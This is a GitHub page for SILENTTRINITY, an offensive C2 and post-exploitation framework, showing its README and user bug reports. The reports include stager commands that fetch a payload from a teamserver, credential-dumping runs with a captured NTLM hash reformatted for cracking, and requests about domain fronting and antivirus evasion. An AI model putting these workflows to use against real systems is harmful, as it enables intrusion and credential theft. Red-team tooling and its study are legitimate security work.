byt3bl33d3r / silenttrinity

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR

License: GNU General Public License v3.0

Python 28.18% XSLT 2.34% Boo 69.04% PowerShell 0.25% C# 0.12% Makefile 0.07%
security-tools c-sharp dotnet ironpython python3 red-teams post-exploitation boolang dotnet-script dotnet-dlr

silenttrinity's Introduction

SILENTTRINITY


SILENTTRINITY is a modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NET's DLR. It's the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs, a technique the author coined BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell-style attacks (as it offers much more flexibility over traditional C# tradecraft), only without using PowerShell in any way.

Some of the main features that distinguish SILENTTRINITY are:

  • Multi-User & Multi-Server - Supports multi-user collaboration. Additionally, the client can connect to and control multiple Teamservers.
  • Client and Teamserver Built in Python 3.7 - The latest and greatest features of the Python language are used; heavy use of Asyncio provides ludicrous speeds.
  • Real-time Updates and Communication - Use of Websockets allows for real-time communication and updates between the Client and Teamserver.
  • Focus on Usability with an Extremely Modern CLI - Powered by prompt-toolkit.
  • Dynamic Evaluation/Compilation Using .NET Scripting Languages - The SILENTTRINITY implant, Naga, is somewhat unique as it uses embedded third-party .NET scripting languages (e.g. Boolang) to dynamically compile/evaluate tasks. This removes the need to compile tasks server side, allows for real-time editing of modules, provides greater flexibility and stealth over traditional C# based payloads and makes everything much more light-weight.
  • ECDHE Encrypted C2 Communication - SILENTTRINITY uses Ephemeral Elliptic Curve Diffie-Hellman Key Exchange to encrypt all C2 traffic between the Teamserver and its implant.
  • Fully Modular - Listeners, Modules, Stagers and C2 Channels are fully modular, allowing operators to easily build their own.
  • Extensive logging - Every action is logged to a file.
  • Future proof - HTTPS/HTTP listeners are built on Quart & Hypercorn, which also support HTTP2 & Websockets.

Call for Contributions

I'm just one person developing this mostly in my spare time; I do need to have a life outside of computers (radical idea, I know).

This means that if anyone finds this tool useful and would like to see X functionality added, the best way to get it added is to submit a Pull Request.

Be the change you want to see in the world!

As of the time of writing, the most useful thing you can contribute is post-ex modules: this would allow me to concentrate efforts on the framework itself, user experience, QOL features etc...

To do this, you're going to have to learn the Boo programming language (the Boo wiki is amazing and has everything you'd need to get started); if you know Python you'll find yourself at home :).

Check out some of the existing modules; if you've written an Empire module before you'll see it's very similar. Finally, you can start porting over post-ex modules from other C2 frameworks such as Empire.

Documentation, Setup & Basic Usage

The documentation is a work in progress but some is already available in the Wiki.

See here for install instructions and here for basic usage.

I recommend making wild use of the help command and the -h flag :)

Author

Marcello Salvati (@byt3bl33d3r)

Acknowledgments, Contributors & Involuntary Contributors

(In no particular order)

  • @devinmadewell for some awesome modules.
  • @RemiEscourrou for some awesome modules.
  • @nicolas_dbresse a.k.a @Daudau for contributing an insane amount of modules.
  • @C_Sto for helping me with some of the .NET ECDHE implementation details and keeping my sanity.
  • @davidtavarez for making some amazing contributions including a cross-platform stager.
  • @mcohmi a.k.a daddycocoaman, for being awesome and making code contributions including modules.
  • @SkelSec for the amazing work on Pypykatz and for being a general inspiration.
  • @cobbr_io for writing SharpSploit which was heavily used as a reference throughout building a lot of the implant code & modules.
  • @harmj0y for writing SeatBelt which I stole (won't be the last thing I'll steal from him either!) and ported over to Boolang and for being a general inspiration.
  • @TheWover & Odzhan for writing Donut which SILENTTRINITY makes heavy use of.
  • modexp for helping me with a bunch of low level Windows stuff which one day I'll learn when I decide to grow up.
  • @xpn for making an AMSI Patch which I stole and for being a general inspiration.
  • @_RastaMouse for making an AMSI Patch which I stole and for being a general inspiration.
  • @r3dQu1nn for writing his awesome AggressorScripts; a decent amount of SILENTTRINITY modules are based off of those scripts.
  • @matterpreter for stealing a bunch of stuff from his OffensiveCSharp repository.
  • @hackabean for some awesome modules.

silenttrinity's People

Contributors

byt3bl33d3r, catwave, daddycocoaman, daudau, davidtavarez, devinmadewell, gimmethecopilot, glides, hackabean, phra, remiescourrou, thewover, tinydile


silenttrinity's Issues

Integrate crackmapexec

Hey,
I would love to see cmedb get integrated with ST. Normally I wouldn't have asked this, but since you're the creator of both these awesome tools, it made sense.

Ability to rename agent

Like the title says, I just want to ask if it is possible to implement renaming the agent after it pops up, like in Empire?!
Thanks for the amazing work and, like I already said on Twitter, you are an amazing coder and pentester, one of the best!!! And all your GitHub proves it!!!

Exception HMAC not valid

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Microsoft Windows [Version 6.1.7601] / .NET v4.0.30319 / Kali 2019.1
  • Python Version:3.7

Expected Behavior

Run the ipy/mimikatz module without generating an exception.

Current Behavior

Launching the build on the Windows target system sometimes generates a 'HMAC not valid' exception: File "/root/SILENTTRINITY/Server/core/crypto.py", line 99, in decrypt raise CryptoException("HMAC not valid")
Sometimes creating the session works and then running the ipy/mimikatz module raises the same exception.
Often everything works fine.

Failure Information

After error occurs, module will not run

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

Start Silent Trinity
cd SILENTTRINITY/Server/
python3.7 st.py -d
Start http Listener
listeners
use http
start
#run the following in a command shell \Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \192.168.88.128\SMB\msbuild.xml
#wait for the new session
sessions
modules
use ipy/mimikatz
run all

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

Error with : IPY stdlib in embedded resources

Issue Template

Context

Doing test with ST

  • SILENTTRINITY Version: last one
  • Operating System: kali linux full update / windows 10 full update
  • Python Version: 3.7

Failure Information

Everything runs fine ... until I got this (Windows side):

PS C:\Users\ddd\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.7.3056.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.

La génération a démarré 01/08/2019 16:56:07.
URL: http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60

Trying to resolve assemblies by staging zip
Attempting HTTP POST to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Attempting HTTP GET to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Downloaded 1950224 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Dynamic.dll in zip
'Microsoft.Dynamic, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.Modules.dll in zip
'IronPython.Modules, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Did not find IPY stdlib in embedded resources: La séquence ne contient aucun élément.
Found IronPython.dll in zip
Found Main.py in zip

And then no session is created on ST

I apologize if it's my fault because I missed something ... but I can't figure out what by now.

thanks

Credential Database

Since we got Pypykatz working with the minidump module now, it would be nice to have a database to store the creds we get instead of just outputting them to the screen. Since I'm gonna want ST to work with CrackMapExec, we might want to make sure the databases are compatible with each other.

HTA stager

Hey,
Is it possible to add mshta based exploits? Generating html applications and running it with mshta shouldn't be a problem, I guess.

[BUG] Hash formatting issues with boo/internalmonologue

Issue Template

Context

boo/internalmonologue doesn't show whether the hash is NTLMv1 or NTLMv2, and gives the wrong format for NTLMv2 hashes.

Upstream repo doesn't accept issues, so per conversation with @byt3bl33d3r I'm filing this here instead.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
  • SILENTTRINITY Version: Latest master branch
  • OS running the Client: Ubuntu 18.04 x64
  • Python Version Running the Client: Python 3.7.4+
  • OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
  • Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

If the internalmonologue attack fails to retrieve an NTLMv1 hash and has to show the NTLMv2 one instead, it should be in the right format.

Current Behavior

Console output below. Victim is Windows 10 Enterprise 1809 as a VM, with Credential Guard enabled (using the Microsoft Device Guard readiness tool):

[1] ST (modules)(boo/internalmonologue) ≫ use boo/getsystem
[1] ST (modules)(boo/getsystem) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: qDkTV0bDZ4)
Getting system...
Impersonating NT AUTHORITY\SYSTEM...
Processes for NT AUTHORITY\SYSTEM: 37
Attempting to impersonate: NT AUTHORITY\SYSTEM
Successfully impersonated: NT AUTHORITY\SYSTEM

[1] ST (modules)(boo/getsystem) ≫ use boo/internalmonologue
[1] ST (modules)(boo/internalmonologue) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: mGySQy9xKR)
Running elevated
Performing NTLM Downgrade
Starting impersonation
S-1-5-21-2347759232-2198512603-1203408765-1000 RuntimeBroker
Impersonated user DESKTOP-2LDSJOS\sysadmin
sysadmin::DESKTOP-2LDSJOS:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000:1122334455667788

Restoring NTLM values

Trying to crack that hash with hashcat:

jeff@blue:~/dev/SILENTTRINITY$ sudo hashcat -m 5500 /tmp/ntlmv1.txt /opt/Passwords/breachcompilationuniq.txt -O -w4 --force 2>/dev/null| grep Token
Hashfile '/tmp/ntlmv1.txt' on line 1 (sysadm...64006d0069006e000000000000000000): Token length exception

Per hashcat documentation, the challenge in the NTLMv2 hash is in the wrong place from the internalmonologue attack. The fix is to put it after the computer name, as follows:

jeff@blue:~/dev/SILENTTRINITY$ cat /tmp/hash
sysadmin::DESKTOP-2LDSJOS:1122334455667788:ec9363e3376248774cfccdfdb943ca96:01010000000000009a947f08f968d5019ef9ce3189e3fb3c00000000080030003000000000000000010000000020000058bb58d0a2bb73feee5a25dd573383f3472c272d8aa58d421695b376ded1cd930a00100000000000000000000000000000000000090030004400450053004b0054004f0050002d0032004c00440053004a004f0053005c00730079007300610064006d0069006e000000000000000000

Failure Information

Shown above.

Steps to Reproduce

  1. Enable Credential Guard on a Windows 10 machine, physical or virtual.
  2. Gain an administrative (or SYSTEM) session and run the boo/internalmonologue module.
  3. Behavior is as above.

Failure Logs

I can provide more information if needed, but I think the above is enough to replicate this from scratch.

[BUG] Module boo/execute-assembly BCE0048: Type 'System.Type' does not support slicing

Hello, I believe I have found a bug in a recent SILENTTRINITY release.

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

SILENTTRINITY Version: Zuiikin 0.4.0dev
OS running the Client: Arch Linux 
Python Version Running the Client 3.7.4
OS running the TeamServer: Arch Linux 
Python version running the Teamserver: 3.7.4

Expected Behavior

Executing a provided .NET assembly from the host machine should give me the output of said assembly being run on the victim machine.

e.g.
set Assembly /home/user/Downloads/Seatbelt.exe
set Arguments all
run all

Current Behavior

No desired output is returned, instead ST errors with:

[*] [TS-eZ8mR] d7b81c90-e6e4-458c-9505-b5aeb4ec73cb returned job result (id: YE0hRRzQwY)
Error compiling source:
YE0hRRzQwY.boo(11,12): BCE0048: Type 'System.Type' does not support slicing.
YE0hRRzQwY.boo(11,27): BCE0048: Type 'System.Type' does not support slicing.

Failure Information

See the screenshot for detailed DEBUG information.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

After installing, pipenv, etc etc... Launch the teamserver python3 teamserver.py 192.168.1.141 pass
Connect client c&c to teamserver python3 st.py wss://username:[email protected]:5000
Set up a listener: listeners, use https, options, start https
Set up a stager: stagers, use powershell, generate https
Copy stager.ps1 to windows victim machine
Execute the stager: powershell -ep bypass .\stager.ps1
Get a session, set up the execute-assembly module and run all.
...

Legacy release works as expected. Please let me know if you need more information and thank you once again for all your time and effort you put into this project.

Stop command needs more user feedback when incorrectly used

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
  • SILENTTRINITY Version: Latest master branch
  • OS running the Client: Ubuntu 18.04 x64
  • Python Version Running the Client: Python 3.7.4+
  • OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
  • Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

The stop command from within the listeners context should stop the listener.

Current Behavior

Currently I wasn't able to stop a listener other than by restarting teamserver.py.

Failure Information

[1] ST ≫ listeners
[1] ST (listeners) ≫ use http
[1] ST (listeners)(http) ≫ set Port 8000
[1] ST (listeners)(http) ≫ list
[1] ST (listeners)(http) ≫ start
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL                        │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫ stop
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL                        │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫

A separate terminal window shows python3 is still listening:

jeff@blue:~/dev/SILENTTRINITY$ lsof -ni | grep :8000
python3 12973 jeff   23u  IPv4 131287      0t0  TCP 10.153.143.148:8000 (LISTEN)

Steps to Reproduce

Start to finish is shown under Failure Information

Failure Logs

I can provide more information if needed, but I think the above is enough to replicate this from scratch.

Detect Proxy Credentials From System

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version:
  • Operating System:
  • Python Version:

Expected Behavior

Please describe the behavior you are expecting.

Current Behavior

What is the current behavior?

Failure Information

Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. step 1
  2. step 2
  3. step 3
    ...

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

Update Mimikatz

Hey there!
Is it possible to update Mimikatz to version 2.1.1-20181209?
Thanks in advance!

Error when compiling msbuild.xml

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Windows 10 x64
  • Python Version: 3.7

Expected Behavior

Establish Session between victim windows 10 and ST server running on Kali OS

Current Behavior

When executing msbuild.exe on the generated msbuild.xml file, it fetches the stage.zip successfully but fails to build.

Error is listed below.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. set up SILENTTRINITY as per the installation wiki
  2. set up a listener and generate msbuild.xml using the msbuild stager
  3. execute the generated command as shown on the Windows 10 x64 victim machine
    ...

Failure Logs

Windows 10 x64 client:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe 'C:\Users\tester\Desktop\msbuild.xml'
Microsoft (R) Build Engine version 4.7.3056.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 26/3/2019 11:39:47 PM.
URL: https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332

Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Attempting HTTP GET to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "C:\Users\tester\Desktop\msbuild.xml" on node 1 (default targets).
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
Done Building Project "C:\Users\tester\Desktop\msbuild.xml" (default targets) -- FAILED.

Build FAILED.

"C:\Users\tester\Desktop\msbuild.xml" (default target) (1) ->
(Hello target) ->
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)

0 Warning(s)
1 Error(s)

Time Elapsed 00:08:15.00

No error from the running st.py on my kali OS.
Able to see the staging established successfully.

Kali OS:
ST (stagers)(msbuild) ≫ generate https
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[*] Sending stage (2068193 bytes) -> 192.168.0.111 ...
ST (stagers)(msbuild) ≫

st.py crashes when typing an invalid option

Context

When trying to navigate through the CLI, typing an invalid option causes the CLI to crash.

  • SILENTTRINITY Version: 0.0.1dev
  • Operating System: Kali Linux 2.0
  • Python Version: 3.7

Expected Behavior

Either going to the modules menu or the application giving an error message.

Current Behavior

Python crashes.

Failure Information

Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.

Steps to Reproduce

ST (modules)(ipconfig) ≫ modules
ST (modules)(ipconfig) ≫ sessions
ST (sessions) ≫ sessions modules
Traceback (most recent call last):
File "st.py", line 143, in <module>
loop()
File "st.py", line 120, in __call__
self.parse_result(result)
File "st.py", line 94, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable


Generated resource file is broken


Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version: 0.0.1dev
  • Operating System: kali-linux
  • Python Version: 3.7.1

Expected Behavior

The generated msbuild.res file works correctly.

Current Behavior

The generated msbuild.res file is broken.

Failure Information

A new line char is missing.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
  2. cd SILENTTRINITY/Server
  3. pipenv install
  4. pipenv shell
  5. stvenom.py msbuild http 8089 --ip 10.10.10.1

Failure Logs

Unknown command 'startmodules'
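Both this issue and the st.py crash reported above come down to the prompt loop handing user-typed words straight to getattr() and functools.partial(). The following is an added example, not SILENTTRINITY's own code, of a dispatcher that resolves a command before binding it; SessionsContext, its methods and the sample session ids are hypothetical stand-ins.

```python
"""Hardened command dispatch for a prompt-style CLI (added example).

The traceback in the "st.py crashes" issue shows the handler being built as
functools.partial(getattr(self.current_context, command[0]), args=command[1:]).
functools.partial requires a callable, so a context attribute that holds data
(here `sessions` inside the sessions context) raises TypeError and kills the
loop. Resolving the name first turns that case, a private attribute, or a
resource line glued together by a missing newline ('startmodules') into an
"Unknown command" message. SessionsContext and its ids are hypothetical.
"""
import functools
import shlex
from typing import Callable, List


class CommandError(Exception):
    """Raised for any command the context cannot run; never escapes dispatch()."""


class SessionsContext:
    """Hypothetical menu context. Note that `sessions` is data, not a command."""

    def __init__(self) -> None:
        # Constructed sample session ids (not real GUIDs).
        self.sessions = ["aa219fb6", "d7b81c90"]

    def list(self, args: List[str]) -> str:
        return f"{len(self.sessions)} session(s)"

    def kill(self, args: List[str]) -> str:
        if not args:
            raise CommandError("kill: missing session id")
        if args[0] not in self.sessions:
            raise CommandError(f"kill: no such session '{args[0]}'")
        self.sessions.remove(args[0])
        return f"killed {args[0]}"

    def _reset(self, args: List[str]) -> str:
        # Private helper: must not be reachable from the prompt.
        self.sessions.clear()
        return "reset"


def resolve(context: object, name: str) -> Callable[..., str]:
    """Map a typed word to a public, callable method of the context or fail loudly."""
    if not name or name.startswith("_"):
        # Blocks _helpers and dunder attributes such as __class__ (which is callable).
        raise CommandError(f"Unknown command '{name}'")
    handler = getattr(context, name, None)
    if handler is None or not callable(handler):
        # The case that crashed st.py: the attribute exists but is not a method.
        raise CommandError(f"Unknown command '{name}'")
    return handler


def dispatch(context: object, line: str) -> str:
    """Run one prompt line; bad input yields a message instead of a traceback."""
    try:
        words = shlex.split(line)
    except ValueError as exc:  # e.g. an unbalanced quote
        return f"[-] Bad command line: {exc}"
    if not words:
        return ""
    try:
        bound = functools.partial(resolve(context, words[0]), args=words[1:])
        return bound()
    except CommandError as exc:
        return f"[-] {exc}"


def run_lines(context: object, script: str) -> List[str]:
    """Execute a resource script one line at a time, skipping blank lines."""
    return [dispatch(context, line) for line in script.splitlines() if line.strip()]


if __name__ == "__main__":
    ctx = SessionsContext()
    for line in ("sessions modules", "list", "kill aa219fb6", "list", "_reset", "listkill d7b81c90"):
        print(f"ST (sessions) > {line}\n{dispatch(ctx, line)}")
```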

Domain fronting

Is it possible to add additional headers for request to facilitate domain fronting? How can I hack the code to get this functionality?

ERROR


ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 10.0.0.113
ST (listeners)(http) ≫ set Port 5000
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://10.0.0.113:5000 (CTRL + C to quit)
ST (listeners)(http) ≫ stagers
ST (stagers) ≫ list
+Available+--------------------------------------+
| Name | Description |
+---------+--------------------------------------+
| wmic | Stage via wmic XSL execution |
+---------+--------------------------------------+
| msbuild | Stage via MSBuild XML inline C# task |
+---------+--------------------------------------+
ST (stagers) ≫ use msbuild
ST (stagers)(msbuild) ≫ options
+-------------+----------+-------+-------------+
| Option Name | Required | Value | Description |
+-------------+----------+-------+-------------+
ST (stagers)(msbuild) ≫ generate http
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
ST (stagers)(msbuild) ≫ [2019-01-17 10:08:16,259] ERROR in app: Exception on request GET /stage.zip
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/quart/app.py", line 1436, in handle_request
return await self.full_dispatch_request(request_context)

Port over the SharpSploit Mimikatz PE Loading code to Boolang

Currently, the Mimikatz module embeds a custom version of SharpSploit to load and execute the Mimikatz DLLs in memory (it's just calling Assembly.Load() on it). From an OPSEC perspective this sucks because it's a static assembly: it doesn't get dynamically compiled on the endpoint and it's just another thing AMSI can trigger on in .NET 4.8.

Ideally I would LOVE to port over the SharpSploit PE Loading code to Boolang so this entire issue goes away but it's def not trivial and is going to require a decent amount of time.

Public IP

Hello

Is it possible to run with a Public IP?

I tried with some options but I was getting connection issues at staging process.

Thanks

feature to stop/kill sessions and listeners

hey,
I have just tested your great tool and I have to say that I like it very much! Good job!

But it would be helpful if it would have the possibility to stop single sessions and listeners.

Thank you very much!

Error when running ipy/powershell module

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version: 0.1.0
  • Operating System: Kali 2018.4 & Also tried on Ubuntu 16.04
  • Python Version: 3.7

Expected Behavior

Run a powershell command.

Current Behavior

Throws an error:
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.

Steps to Reproduce

Used msbuild to create agent. I cannot run any command, whether it's just 'dir' or 'ping', I get the same error.

Failure Logs

ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,850] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
[2019-02-08 15:58:44,925] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,933] 192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
INFO:quart.serving:192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,315] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
[2019-02-08 15:58:45,389] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
[+] aa219fb6-8e99-4e23-a7e4-1142a83a5590 returned job result (id: odTHLXlJ)
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,399] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911

No module named 'core.thirdparty'

Hello,
Using ST, I'm getting this error:

(SILENTTRINITY) bash-3.2$ python3 teamserver.py IP password
2019-08-11 08:14:41,969 32363 IPCServer - [DEBUG] ipcserver.py: run - Started IPC server on 127.0.0.1:64200
2019-08-11 08:14:42,013 32363 MainThread - [DEBUG] selector_events.py: init - Using selector: KqueueSelector
2019-08-11 08:14:42,184 32363 MainThread - [ERROR] loader.py: get_loadables - Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
2019-08-11 08:14:42,334 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 4 listener(s)
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: KEY_EXCHANGE -> Sessions.kex
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: ENCRYPT_STAGE -> Sessions.gen_encrypted_stage
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_STAGED -> Sessions.notify_session_staged
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_CHECKIN -> Sessions.session_checked_in
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: NEW_JOB -> Sessions.add_job
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: JOB_RESULT -> Sessions.job_result
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 12 module(s)
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: GET_STAGERS -> Stagers.get_stagers
2019-08-11 08:14:42,344 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 3 stager(s)
2019-08-11 08:14:42,410 32363 MainThread - [WARNING] teamserver.py: server - Teamserver certificate fingerprint: 6e83733b2d06b0b3efe60e9c0bd741b65eb975c0d9f3eee511f4d1a676bc1afc
2019-08-11 08:14:42,411 32363 MainThread - [INFO] teamserver.py: server - Teamserver started on IP:5000

I see this failed:

Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'

Using a MacBook Pro:
Nome modello: MacBook Pro
Identificatore modello: MacBookPro15,3
Nome processore: Intel Core i9
Velocità processore: 2,9 GHz
Numero di processori: 1
Numero totale di Core: 6
Cache L2 (per Core): 256 KB
Cache L3: 12 MB
Tecnologia Hyper-Threading: Abilitato
Memoria: 32 GB
Versione Boot ROM: 220.270.99.0.0 (iBridge: 16.16.6568.0.0,0)
Versione sistema: macOS 10.14.6 (18G87)
Versione kernel: Darwin 18.7.0
Volume d'avvio: Macintosh HD
Modalità di avvio: Normale

Anyone else getting this error?

Windows 10 Defender (March 4, 2019 update) appeared to block msbuild.xml from executing

Issue Template

Context

I fired up my Windows 10 test VM just now and received an update for the Defender Virus & Threat settings (March 4, 2019). Launched the msbuild.xml file and Defender popped a Threat Notification. 2 days ago, Defender did not catch it... yet.

Behavior: Win32/Quiltan.A!sms
Recommended action: Quarantine threat now.

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Kali Linux 2018
